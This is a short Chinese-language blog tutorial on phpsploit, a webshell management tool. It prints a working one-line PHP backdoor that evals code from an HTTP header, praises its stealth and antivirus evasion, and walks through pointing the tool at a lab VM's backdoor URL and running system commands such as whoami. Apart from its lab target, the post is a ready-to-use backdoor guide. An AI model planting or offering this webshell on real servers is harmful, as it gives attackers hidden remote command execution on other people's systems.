phpsploit的使用

About TOOLS


前言

除了中国菜刀,CKnife,冰蝎以外,最近又在用一款比较骚的后门管理工具,早就出来了,最近才在用,功能也比较齐全,使用命令后进行操作,这里做一个简单的记录。

正文

这里先放上工具的地址:phpsploit

按照README的提示,直接进行安装(安装这块没啥问题,就直接跳过了),安装成功以后,直接运行。

./phpsploit  # 启动命令

然后po上一张作者的启动图(因为我的颜色没这个好看呢):image

本机启动效果:image

在虚拟机中写入phpsploit的后门

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

在这里要讲一下,phpsploit后门的特征,它是使用SERVER进行连接和通信的,不同于菜刀的post方式,具有较强的隐蔽性以及免杀特性。phpsploit的数据流使用BASE64编码的方式加密,所有的数据流都在header中。

虚拟机中后门的地址为:

http://192.168.1.111/a.php

使用phpsploit查看set设置信息:
image
使用help set查看需要设置的选项:image
设置后门地址:

set TARGET http://192.168.1.111/a.php

image
启动phpsploit:

exploit

image

之后就可以执行许多命令,例如:

phpinfo

也可以执行系统命令:

run whoami  # 系统命令需要跟在run后执行

image

小结

很久没有更新了,以后会加速更新速度,会更偏向于内网渗透、域渗透、神兵利器的使用。


Reprint please specify: wh1te phpsploit的使用

Previous
一次奇妙的渗透 一次奇妙的渗透
About 渗透 前言最近应领导要求,开始疯狂搞站,然后大家各种骚操作齐出,因为我比较菜,就一直扫扫扫,然后就有了今天这个博客,想办法绕过它的防护措施。 正文一开始,就是使用某扫描器扫出了Struts-045的洞,很开心,就去利用,然后
2019-09-15
Next
msf初试 msf初试
2019-07-07 wh1te
TOC